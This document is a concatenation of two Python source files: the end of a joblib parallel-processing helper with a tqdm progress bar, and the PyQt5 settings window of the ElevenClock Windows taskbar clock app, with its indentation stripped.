Whether to pass indices to the callback.
backend
Which backend to use for multiprocessing.
See :class:`joblib.Parallel` for valid options.
extractor
Function to apply to the result after all jobs have finished.
show_progress_bar
Whether to show a progress bar.
Returns
-------
:class:`numpy.ndarray`:w
Result depending on :paramref:`extractor` and :paramref:`as_array`.
"""
if show_progress_bar:
try:
try:
from tqdm.notebook import tqdm
except ImportError:
from tqdm import tqdm_notebook as tqdm
import ipywidgets # noqa
except ImportError:
global _msg_shown
tqdm = None
if not _msg_shown:
print(
"Unable to create progress bar. Consider installing `tqdm` as `pip install tqdm` "
"and `ipywidgets` as `pip install ipywidgets`.\n"
"Optionally, you can disable the progress bar using `show_progress_bar=False`."
)
_msg_shown = True
else:
tqdm = None
def update(pbar, queue, n_total):
n_finished = 0
while n_finished < n_total:
if queue.get() is None:
n_finished += 1
elif pbar is not None:
pbar.update()
if pbar is not None:
pbar.close()
def wrapper(*args, **kwargs):
pbar = None if tqdm is None else tqdm(total=len(collection), unit=unit)
queue = Manager().Queue()
thread = Thread(target=update, args=(pbar, queue, len(collections)))
thread.start()
res = jl.Parallel(n_jobs=n_jobs, backend=backend)(
jl.delayed(callback)(
*((i, cs) if use_ixs else (cs,)), *args, **kwargs, queue=queue
)
for i, cs in enumerate(collections)
)
res = np.array(res) if as_array else res
thread.join()
return res if extractor is None else extractor(res)
n_jobs = _get_n_cores(n_jobs, len(collection))
if n_split is None:
n_split = n_jobs
collections = list(filter(len, np.array_split(collection, n_split)))
return wrapper
|
settings.py
|
import glob
import platform
import subprocess
import os
import sys
import locale
import tempfile
import time
from urllib.request import urlopen
from PyQt5 import QtGui
from PyQt5 import QtCore
try:
import psutil
importedPsutil = True
except ImportError:
importedPsutil = False
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from PyQt5.QtCore import pyqtSignal as Signal
import globals
from win32mica import ApplyMica, MICAMODE
from languages import *
from tools import *
from tools import _
import welcome
import win32gui
from win32con import GWL_STYLE, WS_BORDER, WS_THICKFRAME, WS_CAPTION, WS_SYSMENU, WS_POPUP
from external.FramelessWindow import QFramelessWindow, QFramelessDialog
from external.blurwindow import ExtendFrameIntoClientArea, GlobalBlur
class SettingsWindow(QMainWindow):
def __init__(self):
super().__init__()
self.scrollArea = QScrollArea()
sp = QScrollerProperties()
sp.setScrollMetric( QScrollerProperties.DragVelocitySmoothingFactor, 1 )
sp.setScrollMetric( QScrollerProperties.ScrollingCurve, QEasingCurve.InOutCubic )
qs = QScroller.scroller( self.scrollArea )
qs.setScrollerProperties( sp )
self.vlayout = QVBoxLayout()
self.vlayout.setContentsMargins(0, 0, 0, 0)
self.vlayout.setContentsMargins(0, 0, 0, 0)
self.vlayout.setSpacing(0)
layout = QVBoxLayout()
self.updateSize = True
self.scrollArea.setWidgetResizable(True)
self.setObjectName("backgroundWindow")
self.scrollArea.setFrameShape(QFrame.NoFrame)
self.settingsWidget = QWidget()
self.settingsWidget.setObjectName("background")
self.setWindowIcon(QIcon(getPath("icon.ico")))
layout.addSpacing(0)
title = QLabel("\u200e"+_("ElevenClock Settings"))
title.setObjectName("title")
if lang == lang_zh_TW:
title.setStyleSheet("font-size: 20pt;font-family: \"Microsoft JhengHei UI\";font-weight: 600;")
elif lang == lang_zh_CN:
title.setStyleSheet("font-size: 20pt;font-family: \"Microsoft YaHei UI\";font-weight: 600;")
else:
title.setStyleSheet("font-size: 20pt;font-family: \"Segoe UI Variable Text\";font-weight: 600;")
layout.setSpacing(5)
layout.setContentsMargins(10, 0, 0, 0)
layout.addSpacing(0)
self.resize(900, 600)
self.setMinimumWidth(540)
if isWindowDark():
self.iconMode = "white"
else:
self.iconMode = "black"
self.announcements = QAnnouncements()
layout.addWidget(self.announcements)
self.updateButton = QSettingsButton(_("<b>Update to the latest version!</b>"), _("Install update"))
self.updateButton.setStyleSheet("")
self.updateButton.clicked.connect(lambda: KillableThread(target=globals.updateIfPossible, args=((True,))).start())
self.updateButton.hide()
layout.addWidget(self.updateButton)
self.generalSettingsTitle = QSettingsTitle(_("General Settings:"), getPath(f"settings_{self.iconMode}.png"), _("Updates, icon tray, language"))
layout.addWidget(self.generalSettingsTitle)
self.selectedLanguage = QSettingsComboBox(_("ElevenClock's language")+" (Language)", _("Change")) # The non-translated (Language) string is there to let people know what the language option is if you accidentaly change the language
self.selectedLanguage.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
try:
self.selectedLanguage.setItems(list(languageReference.values()), list(languageReference.keys()).index(langName))
except Exception as e:
report(e)
self.selectedLanguage.setItems(list(languageReference.values()), 0)
def changeLang(text):
keys = list(languageReference.keys())
values = list(languageReference.values())
for i in range(len(values)):
if(text == values[i]):
setSettingsValue("PreferredLanguage", str(keys[i]), r=False)
self.selectedLanguage.showRestartButton()
def restartElevenClockByLangChange():
subprocess.run(str("start /B \"\" \""+sys.executable)+"\" --settings", shell=True)
globals.app.quit()
self.selectedLanguage.restartButton.clicked.connect(restartElevenClockByLangChange)
self.selectedLanguage.textChanged.connect(changeLang)
self.generalSettingsTitle.addWidget(self.selectedLanguage)
self.enableUpdates = QSettingsCheckBox(_("Automatically check for updates"))
self.enableUpdates.setChecked(not getSettings("DisableAutoCheckForUpdates"))
self.enableUpdates.stateChanged.connect(lambda i: setSettings("DisableAutoCheckForUpdates", not bool(i), r = False))
self.generalSettingsTitle.addWidget(self.enableUpdates)
self.installUpdates = QSettingsCheckBox(_("Automatically install available updates"))
self.installUpdates.setChecked(not getSettings("DisableAutoInstallUpdates"))
self.installUpdates.stateChanged.connect(lambda i: setSettings("DisableAutoInstallUpdates", not bool(i), r = False))
self.generalSettingsTitle.addWidget(self.installUpdates)
self.silentUpdates = QSettingsCheckBox(_("Enable really silent updates"))
self.silentUpdates.setChecked(getSettings("EnableSilentUpdates"))
self.silentUpdates.stateChanged.connect(lambda i: setSettings("EnableSilentUpdates", bool(i), r = False))
self.generalSettingsTitle.addWidget(self.silentUpdates)
self.bypassCNAMECheck = QSettingsCheckBox(_("Bypass update provider authenticity check (NOT RECOMMENDED, AT YOUR OWN RISK)"))
self.bypassCNAMECheck.setChecked(getSettings("BypassDomainAuthCheck"))
self.bypassCNAMECheck.stateChanged.connect(lambda i: setSettings("BypassDomainAuthCheck", bool(i), r = False))
self.generalSettingsTitle.addWidget(self.bypassCNAMECheck)
self.enableSystemTray = QSettingsCheckBox(_("Show ElevenClock on system tray"))
self.enableSystemTray.setChecked(not getSettings("DisableSystemTray"))
self.enableSystemTray.stateChanged.connect(lambda i: setSettings("DisableSystemTray", not bool(i)))
self.generalSettingsTitle.addWidget(self.enableSystemTray)
self.disableTaskMgr = QSettingsCheckBox(_("Hide extended options from the clock right-click menu (needs a restart to be aplied)"))
self.disableTaskMgr.setChecked(getSettings("HideTaskManagerButton"))
self.disableTaskMgr.stateChanged.connect(lambda i: setSettings("HideTaskManagerButton", bool(i)))
self.generalSettingsTitle.addWidget(self.disableTaskMgr)
self.startupButton = QSettingsButton(_("Change startup behaviour"), _("Change"))
self.startupButton.clicked.connect(lambda: os.startfile("ms-settings:startupapps"))
self.generalSettingsTitle.addWidget(self.startupButton)
self.clockSettingsTitle = QSettingsTitle(_("Clock Settings:"), getPath(f"clock_{self.iconMode}.png"), _("Fullscreen behaviour, clock position, 1st monitor clock, other miscellanious settings"))
layout.addWidget(self.clockSettingsTitle)
self.legacyHideOnFullScreen = QSettingsCheckBox(_("Hide the clock in fullscreen mode"))
self.legacyHideOnFullScreen.setChecked(not getSettings("DisableHideOnFullScreen"))
self.legacyHideOnFullScreen.stateChanged.connect(lambda i: setSettings("DisableHideOnFullScreen", not bool(i)))
self.clockSettingsTitle.addWidget(self.legacyHideOnFullScreen)
self.newFullScreenHide = QSettingsCheckBox(_("Hide the clock when a program occupies all screens"))
self.newFullScreenHide.setChecked(getSettings("NewFullScreenMethod"))
self.newFullScreenHide.stateChanged.connect(lambda i: setSettings("NewFullScreenMethod", bool(i)))
self.clockSettingsTitle.addWidget(self.newFullScreenHide)
self.forceClockToShow = QSettingsCheckBox(_("Show the clock when the taskbar is set to hide automatically"))
self.forceClockToShow.setChecked(getSettings("DisableHideWithTaskbar"))
self.forceClockToShow.stateChanged.connect(lambda i: setSettings("DisableHideWithTaskbar", bool(i)))
self.clockSettingsTitle.addWidget(self.forceClockToShow)
self.showDesktopButton = QSettingsCheckBox(_("Add the \"Show Desktop\" button on the left corner of every clock"))
self.showDesktopButton.setChecked(getSettings("ShowDesktopButton"))
self.showDesktopButton.stateChanged.connect(lambda i: setSettings("ShowDesktopButton", bool(i)))
self.primaryScreen = QSettingsCheckBox(_("Show the clock on the primary screen"))
self.primaryScreen.setChecked(getSettings("ForceClockOnFirstMonitor"))
self.primaryScreen.stateChanged.connect(lambda i: setSettings("ForceClockOnFirstMonitor", bool(i)))
self.clockSettingsTitle.addWidget(self.primaryScreen)
self.onlyPrimaryScreen = QSettingsCheckBox(_("Do not show the clock on secondary monitors"))
self.onlyPrimaryScreen.setChecked(getSettings("HideClockOnSecondaryMonitors"))
self.onlyPrimaryScreen.stateChanged.connect(lambda i: setSettings("HideClockOnSecondaryMonitors", bool(i)))
self.clockSettingsTitle.addWidget(self.onlyPrimaryScreen)
self.hideClockWhenClicked = QSettingsCheckBox(_("Hide the clock during 10 seconds when clicked"))
self.hideClockWhenClicked.setChecked(getSettings("HideClockWhenClicked"))
self.hideClockWhenClicked.stateChanged.connect(lambda i: setSettings("HideClockWhenClicked", bool(i)))
self.clockSettingsTitle.addWidget(self.hideClockWhenClicked)
self.enableLowCpuMode = QSettingsCheckBoxWithWarning(_("Enable low-cpu mode"), _("You might lose functionalities, like the notification counter or the dynamic background"))
self.enableLowCpuMode.setStyleSheet(f"QWidget#stChkBg{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;border-bottom: {self.getPx(1)}px;}}")
self.enableLowCpuMode.setChecked(getSettings("EnableLowCpuMode"))
self.enableLowCpuMode.stateChanged.connect(lambda i: setSettings("EnableLowCpuMode", bool(i)))
self.disableNotificationBadge = QSettingsCheckBox(_("Disable the notification badge"))
self.disableNotificationBadge.setChecked(getSettings("DisableNotifications"))
self.disableNotificationBadge.stateChanged.connect(lambda i: setSettings("DisableNotifications", bool(i)))
self.clockSettingsTitle.addWidget(self.disableNotificationBadge)
self.clockSettingsTitle.addWidget(self.enableLowCpuMode)
self.clockPosTitle = QSettingsTitle(_("Clock position and size:"), getPath(f"size_{self.iconMode}.png"), _("Clock size preferences, position offset, clock at the left, etc."))
layout.addWidget(self.clockPosTitle)
self.clockPosTitle.addWidget(self.showDesktopButton)
self.clockAtLeft = QSettingsCheckBox(_("Show the clock at the left of the screen"))
self.clockAtLeft.setChecked(getSettings("ClockOnTheLeft"))
self.clockAtLeft.stateChanged.connect(lambda i: setSettings("ClockOnTheLeft", bool(i)))
self.clockPosTitle.addWidget(self.clockAtLeft)
self.clockAtBottom = QSettingsCheckBox(_("Force the clock to be at the bottom of the screen"))
self.clockAtBottom.setChecked(getSettings("ForceOnBottom"))
self.clockAtBottom.stateChanged.connect(lambda i: setSettings("ForceOnBottom", bool(i)))
self.clockPosTitle.addWidget(self.clockAtBottom)
self.clockAtTop = QSettingsCheckBox(_("Force the clock to be at the top of the screen"))
self.clockAtTop.setChecked(getSettings("ForceOnTop"))
self.clockAtTop.setStyleSheet(f"QWidget#stChkBg{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;border-bottom: {self.getPx(1)}px;}}")
self.clockAtTop.stateChanged.connect(lambda i: setSettings("ForceOnTop", bool(i)))
self.clockPosTitle.addWidget(self.clockAtTop)
self.clockFixedHeight = QSettingsSliderWithCheckBox(_("Override clock default height"), self, 20, 105)
self.clockFixedHeight.setChecked(getSettings("ClockFixedHeight"))
if self.clockFixedHeight.isChecked():
try:
self.clockFixedHeight.slider.setValue(int(getSettingsValue("ClockFixedHeight")))
except ValueError:
print("🟠 Unable to parse int from ClockFixedHeight settings value")
self.clockFixedHeight.stateChanged.connect(lambda v: setSettings("ClockFixedHeight", bool(v)))
self.clockFixedHeight.valueChanged.connect(lambda v: setSettingsValue("ClockFixedHeight", str(v)))
self.clockPosTitle.addWidget(self.clockFixedHeight)
self.ClockFixedWidth = QSettingsSliderWithCheckBox(_("Specify a minimum width for the clock"), self, 30, 200)
self.ClockFixedWidth.setChecked(getSettings("ClockFixedWidth"))
if self.ClockFixedWidth.isChecked():
try:
self.ClockFixedWidth.slider.setValue(int(getSettingsValue("ClockFixedWidth")))
except ValueError:
print("🟠 Unable to parse int from ClockFixedWidth settings value")
self.ClockFixedWidth.stateChanged.connect(lambda v: setSettings("ClockFixedWidth", bool(v)))
self.ClockFixedWidth.valueChanged.connect(lambda v: setSettingsValue("ClockFixedWidth", str(v)))
self.clockPosTitle.addWidget(self.ClockFixedWidth)
self.clockXOffset = QSettingsSliderWithCheckBox(_("Adjust horizontal clock position"), self, -200, 200)
self.clockXOffset.setChecked(getSettings("ClockXOffset"))
if self.clockXOffset.isChecked():
try:
self.clockXOffset.slider.setValue(int(getSettingsValue("ClockXOffset")))
except ValueError:
print("🟠 Unable to parse int from ClockXOffset settings value")
self.clockXOffset.stateChanged.connect(lambda v: setSettings("ClockXOffset", bool(v)))
self.clockXOffset.valueChanged.connect(lambda v: setSettingsValue("ClockXOffset", str(v)))
self.clockPosTitle.addWidget(self.clockXOffset)
self.clockYOffset = QSettingsSliderWithCheckBox(_("Adjust vertical clock position"), self, -200, 200)
self.clockYOffset.setChecked(getSettings("ClockYOffset"))
if self.clockYOffset.isChecked():
try:
self.clockYOffset.slider.setValue(int(getSettingsValue("ClockYOffset")))
except ValueError:
print("🟠 Unable to parse int from clockYOffset settings value")
self.clockYOffset.stateChanged.connect(lambda v: setSettings("ClockYOffset", bool(v)))
self.clockYOffset.valueChanged.connect(lambda v: setSettingsValue("ClockYOffset", str(v)))
self.clockPosTitle.addWidget(self.clockYOffset)
def unblacklist():
global msg
setSettingsValue("BlacklistedMonitors", "")
globals.restartClocks()
msg = QFramelessDialog(parent=self, closeOnClick=True)
msg.setAutoFillBackground(True)
msg.setStyleSheet(globals.sw.styleSheet())
msg.setAttribute(Qt.WA_StyledBackground)
msg.setObjectName("QMessageBox")
msg.setTitle(_("Success"))
msg.setText(f"""{_("The monitors were unblacklisted successfully.")}<br>
{_("Now you should see the clock everywhere")}""")
msg.addButton(_("Ok"), QDialogButtonBox.ButtonRole.ApplyRole)
msg.setDefaultButtonRole(QDialogButtonBox.ButtonRole.ApplyRole, self.styleSheet())
msg.show()
self.unBlackListButton = QSettingsButton(_("Reset monitor blacklisting status"), _("Reset"))
self.unBlackListButton.clicked.connect(unblacklist)
self.clockPosTitle.addWidget(self.unBlackListButton)
self.clockAppearanceTitle = QSettingsTitle(_("Clock Appearance:"), getPath(f"appearance_{self.iconMode}.png"), _("Clock's font, font size, font color and background, text alignment"))
layout.addWidget(self.clockAppearanceTitle)
self.fontPrefs = QSettingsFontBoxComboBox(_("Use a custom font"))
self.fontPrefs.setChecked(getSettings("UseCustomFont"))
if self.fontPrefs.isChecked():
customFont = getSettingsValue("UseCustomFont")
if customFont:
self.fontPrefs.combobox.setCurrentText(customFont)
self.fontPrefs.combobox.lineEdit().setFont(QFont(customFont))
else:
if lang == lang_ko:
self.fontPrefs.combobox.setCurrentText("Malgun Gothic")
elif lang == lang_zh_TW:
self.fontPrefs.combobox.setCurrentText("Microsoft JhengHei UI")
elif lang == lang_zh_CN:
self.fontPrefs.combobox.setCurrentText("Microsoft YaHei UI")
else:
self.fontPrefs.combobox.setCurrentText("Segoe UI Variable Display")
self.fontPrefs.stateChanged.connect(lambda i: setSettings("UseCustomFont", bool(i)))
self.fontPrefs.valueChanged.connect(lambda v: setSettingsValue("UseCustomFont", v))
self.clockAppearanceTitle.addWidget(self.fontPrefs)
self.fontSize = QSettingsSizeBoxComboBox(_("Use a custom font size"))
self.fontSize.setChecked(getSettings("UseCustomFontSize"))
self.fontSize.loadItems()
if self.fontSize.isChecked():
customFontSize = getSettingsValue("UseCustomFontSize")
if customFontSize:
self.fontSize.combobox.setCurrentText(customFontSize)
else:
self.fontSize.combobox.setCurrentText("9")
self.fontSize.stateChanged.connect(lambda i: setSettings("UseCustomFontSize", bool(i)))
self.fontSize.valueChanged.connect(lambda v: setSettingsValue("UseCustomFontSize", v))
self.clockAppearanceTitle.addWidget(self.fontSize)
self.fontColor = QSettingsSizeBoxColorDialog(_("Use a custom font color"))
self.fontColor.setChecked(getSettings("UseCustomFontColor"))
if self.fontColor.isChecked():
self.fontColor.button.setStyleSheet(f"color: rgb({getSettingsValue('UseCustomFontColor')})")
self.fontColor.stateChanged.connect(lambda i: setSettings("UseCustomFontColor", bool(i)))
self.fontColor.valueChanged.connect(lambda v: setSettingsValue("UseCustomFontColor", v))
self.clockAppearanceTitle.addWidget(self.fontColor)
self.disableSystemTrayColor = QSettingsCheckBox(_("Disable clock taskbar background color (make clock transparent)"))
self.disableSystemTrayColor.setChecked(getSettings("DisableTaskbarBackgroundColor"))
self.disableSystemTrayColor.stateChanged.connect(lambda i: setSettings("DisableTaskbarBackgroundColor", bool(i)))
self.clockAppearanceTitle.addWidget(self.disableSystemTrayColor)
self.backgroundcolor = QSettingsBgBoxColorDialog(_("Use a custom background color"))
self.backgroundcolor.setChecked(getSettings("UseCustomBgColor"))
self.backgroundcolor.colorDialog.setOption(QColorDialog.ShowAlphaChannel, True)
if self.backgroundcolor.isChecked():
self.backgroundcolor.button.setStyleSheet(f"background-color: rgba({getSettingsValue('UseCustomBgColor')})")
self.backgroundcolor.stateChanged.connect(lambda i: setSettings("UseCustomBgColor", bool(i)))
self.backgroundcolor.valueChanged.connect(lambda v: setSettingsValue("UseCustomBgColor", v))
self.clockAppearanceTitle.addWidget(self.backgroundcolor)
self.accentBgColor = QSettingsCheckBox(_("Use system accent color as background color"))
self.accentBgColor.setChecked(getSettings("AccentBackgroundcolor"))
self.accentBgColor.stateChanged.connect(lambda i: setSettings("AccentBackgroundcolor", bool(i)))
self.clockAppearanceTitle.addWidget(self.accentBgColor)
self.centerText = QSettingsCheckBox(_("Align the clock text to the center"))
self.centerText.setChecked(getSettings("CenterAlignment"))
self.centerText.setStyleSheet(f"QWidget#stChkBg{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;border-bottom: {self.getPx(1)}px;}}")
self.centerText.stateChanged.connect(lambda i: setSettings("CenterAlignment", bool(i)))
self.clockAppearanceTitle.addWidget(self.centerText)
self.dateTimeTitle = QSettingsTitle(_("Date & Time Settings:"), getPath(f"datetime_{self.iconMode}.png"), _("Date format, Time format, seconds,weekday, weeknumber, regional settings"))
layout.addWidget(self.dateTimeTitle)
self.showTime = QSettingsCheckBox(_("Show time on the clock"))
self.showTime.setChecked(not getSettings("DisableTime"))
self.showTime.stateChanged.connect(lambda i: setSettings("DisableTime", not bool(i), r = False))
self.dateTimeTitle.addWidget(self.showTime)
self.showSeconds = QSettingsCheckBox(_("Show seconds on the clock"))
self.showSeconds.setChecked(getSettings("EnableSeconds"))
self.showSeconds.stateChanged.connect(lambda i: setSettings("EnableSeconds", bool(i), r = False))
self.dateTimeTitle.addWidget(self.showSeconds)
self.showDate = QSettingsCheckBox(_("Show date on the clock"))
self.showDate.setChecked(not getSettings("DisableDate"))
self.showDate.stateChanged.connect(lambda i: setSettings("DisableDate", not bool(i), r = False))
self.dateTimeTitle.addWidget(self.showDate)
self.showWeekCount = QSettingsCheckBox(_("Show week number on the clock"))
self.showWeekCount.setChecked(getSettings("EnableWeekNumber"))
self.showWeekCount.stateChanged.connect(lambda i: setSettings("EnableWeekNumber", bool(i), r = False))
self.dateTimeTitle.addWidget(self.showWeekCount)
self.showWeekday = QSettingsCheckBox(_("Show weekday on the clock"))
self.showWeekday.setChecked(getSettings("EnableWeekDay"))
self.showWeekday.stateChanged.connect(lambda i: setSettings("EnableWeekDay", bool(i)))
self.dateTimeTitle.addWidget(self.showWeekday)
self.RegionButton = QSettingsButton(_("Change date and time format (Regional settings)"), _("Regional settings"))
self.RegionButton.clicked.connect(lambda: os.startfile("intl.cpl"))
self.dateTimeTitle.addWidget(self.RegionButton)
self.experimentalTitle = QSettingsTitle(_("Fixes and other experimental features: (Use ONLY if something is not working)"), getPath(f"experiment_{self.iconMode}.png"), _("Testing features and error-fixing tools"))
layout.addWidget(self.experimentalTitle)
self.wizardButton = QSettingsButton(_("Open the welcome wizard")+_(" (ALPHA STAGE, MAY NOT WORK)"), _("Open"))
def ww():
global welcomewindow
welcomewindow = welcome.WelcomeWindow()
self.wizardButton.clicked.connect(ww)
self.wizardButton.button.setObjectName("AccentButton")
self.wizardButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
self.experimentalTitle.addWidget(self.wizardButton)
self.fixDash = QSettingsCheckBox(_("Fix the hyphen/dash showing over the month"))
self.fixDash.setChecked(getSettings("EnableHyphenFix"))
self.fixDash.stateChanged.connect(lambda i: setSettings("EnableHyphenFix", bool(i)))
self.experimentalTitle.addWidget(self.fixDash)
self.fixSSL = QSettingsCheckBox(_("Alternative non-SSL update server (This might help with SSL errors)"))
self.fixSSL.setChecked(getSettings("AlternativeUpdateServerProvider"))
self.fixSSL.stateChanged.connect(lambda i: setSettings("AlternativeUpdateServerProvider", bool(i)))
self.experimentalTitle.addWidget(self.fixSSL)
self.win32alignment = QSettingsCheckBox(_("Alternative clock alignment (may not work)"))
self.win32alignment.setChecked(getSettings("EnableWin32API"))
self.win32alignment.setStyleSheet(f"QWidget#stChkBg{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;border-bottom: {self.getPx(1)}px;}}")
self.win32alignment.stateChanged.connect(lambda i: setSettings("EnableWin32API", bool(i)))
self.experimentalTitle.addWidget(self.win32alignment)
self.legacyRDPHide = QSettingsCheckBox(_("Hide the clock when RDP Client or Citrix Workspace are running")+" (Old method)".replace("RDP", "RDP, VMWare Horizon"))
self.legacyRDPHide.setChecked(getSettings("EnableHideOnRDP"))
self.legacyRDPHide.stateChanged.connect(lambda i: setSettings("EnableHideOnRDP", bool(i)))
self.experimentalTitle.addWidget(self.legacyRDPHide)
self.legacyFullScreenHide = QSettingsCheckBox(_("Check only the focused window on the fullscreen check"))
self.legacyFullScreenHide.setChecked(getSettings("legacyFullScreenMethod"))
self.legacyFullScreenHide.stateChanged.connect(lambda i: setSettings("legacyFullScreenMethod", bool(i)))
self.experimentalTitle.addWidget(self.legacyFullScreenHide)
self.languageSettingsTitle = QSettingsTitle(_("About the language pack:"), getPath(f"lang_{self.iconMode}.png"), _("Language pack author(s), help translating ElevenClock"))
layout.addWidget(self.languageSettingsTitle)
self.PackInfoButton = QSettingsButton(_("Translated to English by martinet101"), "")
self.PackInfoButton.button.hide()
self.PackInfoButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
self.languageSettingsTitle.addWidget(self.PackInfoButton)
self.openTranslateButton = QSettingsButton(_("Translate ElevenClock to your language"), _("Get started"))
self.openTranslateButton.clicked.connect(lambda: os.startfile("https://github.com/martinet101/ElevenClock/wiki/Translating-ElevenClock#translating-elevenclock"))
self.languageSettingsTitle.addWidget(self.openTranslateButton)
def thirdPartyLicenses():
msg = QFramelessDialog(parent=self, closeOnClick=False)
msg.setAutoFillBackground(True)
msg.setStyleSheet(self.styleSheet())
msg.setAttribute(Qt.WA_StyledBackground)
msg.setWindowFlag(Qt.WindowStaysOnTopHint)
msg.setObjectName("QMessageBox")
msg.setTitle(_("Third Party Open-Source Software in Elevenclock {0} (And their licenses)").format(versionName))
colors = getColors()
msg.setText(f"""
<p>{_("ElevenClock is an Open-Source application made with the help of other libraries made by the community:")}</p><br>
<style> a {{color: rgb({colors[2 if isWindowDark() else 4]})}}</style>
<ul>
<li> <b>Python 3.9</b>: <a href="https://docs.python.org/3/license.html">PSF License Agreement</a></li>
<li> <b>Win32mica</b> (Also made by me): <a href="https://github.com/martinet101/pymica/blob/master/LICENSE">MIT License</a></li>
<li> <b>PyWin32</b>: <a href="https://pypi.org/project/pynput/">LGPL-v3</a></li>
<li> <b>PyQt5 (Qt5)</b>: <a href="https://www.riverbankcomputing.com/commercial/license-faq">LGPL-v3</a></li>
<li> <b>Psutil</b>: <a href="https://github.com/giampaolo/psutil/blob/master/LICENSE">BSD 3-Clause</a></li>
<li> <b>PyInstaller</b>: <a href="https://www.pyinstaller.org/license.html">Custom GPL</a></li>
<li> <b>Frameless Window</b>: <a href="https://github.com/mustafaahci/FramelessWindow/blob/master/LICENSE">The Unlicense</a></li>
<li> <b>WNFUN</b>: <a href="https://github.com/ionescu007/wnfun/blob/master/LICENSE">BSD 2-Clause</a></li>
</ul> """)
msg.addButton(_("Ok"), QDialogButtonBox.ButtonRole.ApplyRole, lambda: msg.close())
msg.addButton(_("More Info"), QDialogButtonBox.ButtonRole.ResetRole, lambda: os.startfile("https://github.com/martinet101/ElevenClock/wiki#third-party-libraries"))
def closeAndQt():
msg.close()
QMessageBox.aboutQt(self, "ElevenClock - "+_("About Qt"))
msg.addButton(_("About Qt"), QDialogButtonBox.ButtonRole.ResetRole, lambda: closeAndQt())
msg.setDefaultButtonRole(QDialogButtonBox.ButtonRole.ApplyRole, self.styleSheet())
msg.show()
self.aboutTitle = QSettingsTitle(_("About ElevenClock version {0}:").format(versionName), getPath(f"about_{self.iconMode}.png"), _("Info, report a bug, submit a feature request, donate, about"))
layout.addWidget(self.aboutTitle)
self.WebPageButton = QSettingsButton(_("View ElevenClock's homepage"), _("Open"))
self.WebPageButton.clicked.connect(lambda: os.startfile("https://github.com/martinet101/ElevenClock/"))
self.WebPageButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
self.aboutTitle.addWidget(self.WebPageButton)
self.ThirdParty = QSettingsButton(_("Third party licenses"), _("View"))
self.ThirdParty.clicked.connect(lambda: thirdPartyLicenses())
self.ThirdParty.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
self.aboutTitle.addWidget(self.ThirdParty)
self.IssueButton = QSettingsButton(_("Report an issue/request a feature"), _("Report"))
self.IssueButton.clicked.connect(lambda: os.startfile("https://github.com/martinet101/ElevenClock/issues/new/choose"))
self.IssueButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
self.aboutTitle.addWidget(self.IssueButton)
self.CofeeButton = QSettingsButton(_("Support the dev: Give me a coffee☕"), _("Open page"))
self.CofeeButton.clicked.connect(lambda: os.startfile("https://ko-fi.com/martinet101"))
self.CofeeButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
self.aboutTitle.addWidget(self.CofeeButton)
self.closeButton = QSettingsButton(_("Close settings"), _("Close"))
self.closeButton.clicked.connect(lambda: self.hide())
self.aboutTitle.addWidget(self.closeButton)
self.debbuggingTitle = QSettingsTitle(_("Debbugging information:"), getPath(f"bug_{self.iconMode}.png"), _("Log, debugging information"))
layout.addWidget(self.debbuggingTitle)
self.helpButton = QSettingsButton(_("Open online help to troubleshoot problems"), _("Open"))
self.helpButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
self.helpButton.clicked.connect(lambda: os.startfile("https://github.com/martinet101/ElevenClock/wiki/Troubleshooting"))
self.debbuggingTitle.addWidget(self.helpButton)
self.resetButton = QSettingsButton(_("Reset ElevenClock preferences to defaults"), _("Reset"))
self.resetButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
def resetSettings():
for file in glob.glob(os.path.join(os.path.expanduser("~"), ".elevenclock/*")):
if not "Running" in file:
try:
os.remove(file)
except:
pass
self.resetButton.clicked.connect(lambda: (resetSettings(), os.startfile(sys.executable)))
self.debbuggingTitle.addWidget(self.resetButton)
self.logButton = QSettingsButton(_("Open ElevenClock's log"), _("Open"))
self.logButton.clicked.connect(lambda: self.openLogWindow())
self.logButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
self.debbuggingTitle.addWidget(self.logButton)
try:
if importedPsutil:
self.hiddenButton = QSettingsButton(f"ElevenClock Version: {versionName} {platform.architecture()[0]} (version code {version})\nSystem version: {platform.system()} {str(int(platform.release())+1) if int(platform.version().split('.')[-1])>=22000 else platform.release()} {platform.win32_edition()} {platform.version()}\nSystem architecture: {platform.machine()}\n\nTotal RAM: {psutil.virtual_memory().total/(1000.**3)}\n\nSystem locale: {locale.getdefaultlocale()[0]}\nElevenClock language locale: lang_{langName}", _(""), h=140)
else:
self.hiddenButton = QSettingsButton(f"ElevenClock Version: {versionName} {platform.architecture()[0]} (version code {version})\nSystem version: {platform.system()} {str(int(platform.release())+1) if int(platform.version().split('.')[-1])>=22000 else platform.release()} {platform.win32_edition()} {platform.version()}\nSystem architecture: {platform.machine()}\n\nTotal RAM: Unknown\n\nSystem locale: {locale.getdefaultlocale()[0]}\nElevenClock language locale: lang_{langName}", _(""), h=140)
except Exception as e:
report(e)
if importedPsutil:
